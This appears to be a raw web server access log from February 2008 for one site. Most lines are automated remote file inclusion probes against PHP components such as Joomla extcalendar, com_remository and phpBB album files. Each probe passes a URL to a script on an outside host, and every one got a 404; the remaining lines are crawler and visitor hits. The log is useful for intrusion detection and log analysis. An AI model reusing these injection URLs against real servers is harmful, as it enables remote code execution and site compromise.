74.208.16.77 - - [26/Feb/2008:06:28:51 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.77 - - [26/Feb/2008:06:28:52 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.77 - - [26/Feb/2008:06:28:52 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.77 - - [26/Feb/2008:06:28:55 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
218.50.53.151 - - [26/Feb/2008:06:29:07 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.42.89 - - [26/Feb/2008:06:29:19 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.51.42.89 - - [26/Feb/2008:06:29:19 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
74.208.16.77 - - [26/Feb/2008:06:29:42 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.77 - - [26/Feb/2008:06:29:42 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.77 - - [26/Feb/2008:06:29:42 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:29:50 -0800] "GET /logs/access_071124.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:29:50 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:29:51 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.42.226 - - [26/Feb/2008:06:30:04 -0800] "GET /index3.php?=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:30:07 -0800] "GET /logs/access_080120.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.42.226 - - [26/Feb/2008:06:30:07 -0800] "GET /logs/index3.php?=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
72.36.191.42 - - [26/Feb/2008:06:30:09 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [26/Feb/2008:06:30:09 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [26/Feb/2008:06:30:12 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [26/Feb/2008:06:30:13 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.144.182.158 - - [26/Feb/2008:06:30:22 -0800] "GET / HTTP/1.1" 200 3094 "http://www.tommyyune.com/forum/messages/13/21.html?TuesdayOctober320060430pm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
75.144.182.158 - - [26/Feb/2008:06:30:23 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:06:30:42 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
193.136.6.38 - - [26/Feb/2008:06:30:42 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.208.16.77 - - [26/Feb/2008:06:30:51 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.allfist.com/gratuit/photos/3/27544645/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:31:23 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:31:24 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [26/Feb/2008:06:31:28 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/ghanjar.satriani/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.17.98 - - [26/Feb/2008:06:31:46 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:06:31:47 -0800] "GET /logs/access_071222.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:06:31:47 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:06:31:48 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.172 - - [26/Feb/2008:06:32:08 -0800] "GET /retreat1/?D=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:33:09 -0800] "GET /retreat1/webcam/retreat1_00763.jpg HTTP/1.0" 200 16004 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:06:33:19 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:33:30 -0800] "GET /retreat1/webcam/retreat1_00308.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:33:32 -0800] "GET /logs/access_071222.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:33:33 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:33:33 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:33:48 -0800] "GET /retreat1/webcam/retreat1_00306.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
217.148.95.146 - - [26/Feb/2008:06:33:57 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:34:11 -0800] "GET /retreat1/webcam/retreat1_00081.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
72.36.191.42 - - [26/Feb/2008:06:34:16 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.191.42 - - [26/Feb/2008:06:34:18 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.166 - - [26/Feb/2008:06:34:24 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [26/Feb/2008:06:34:24 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [26/Feb/2008:06:34:25 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:34:31 -0800] "GET /logs/access_080111.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:34:31 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:34:32 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:34:33 -0800] "GET /retreat1/webcam/retreat1_00741.jpg HTTP/1.0" 200 16291 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:34:34 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:06:34:42 -0800] "GET /logs/access_080211.log/index.php?option=com_remository&Itemid=&func=&cat=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:06:34:42 -0800] "GET /index.php?option=com_remository&Itemid=&func=&cat=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:06:34:43 -0800] "GET /logs/index.php?option=com_remository&Itemid=&func=&cat=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:06:34:49 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:06:34:51 -0800] "GET /logs/access_080117.log/index.php?option=com_remository&Itemid=&func=&cat=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:06:34:53 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:34:54 -0800] "GET /retreat1/webcam/retreat1_00841.jpg HTTP/1.0" 200 52093 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:06:34:56 -0800] "GET /logs/access_080120.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:01 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:06:35:17 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:06:35:17 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:06:35:18 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:06:35:18 -0800] "GET /logs/access_080211.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:06:35:18 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [26/Feb/2008:06:35:19 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:22 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:35:25 -0800] "GET /retreat1/webcam/retreat1_00627.jpg HTTP/1.0" 200 15255 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:25 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:25 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:26 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:29 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:29 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:29 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:30 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:31 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:31 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:35:36 -0800] "GET /retreat1/webcam/retreat1_00266.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:35:38 -0800] "GET /logs/access_071222.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:35:38 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [26/Feb/2008:06:35:38 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:42 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:43 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:43 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:46 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:46 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:46 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:48 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:48 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:49 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:49 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:49 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:49 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:51 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:51 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:51 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:52 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:52 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:52 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:54 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:55 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [26/Feb/2008:06:35:55 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://surfinhu.890m.com/off.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [26/Feb/2008:06:35:57 -0800] "GET /retreat1/webcam/retreat1_00997.jpg HTTP/1.0" 200 42454 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
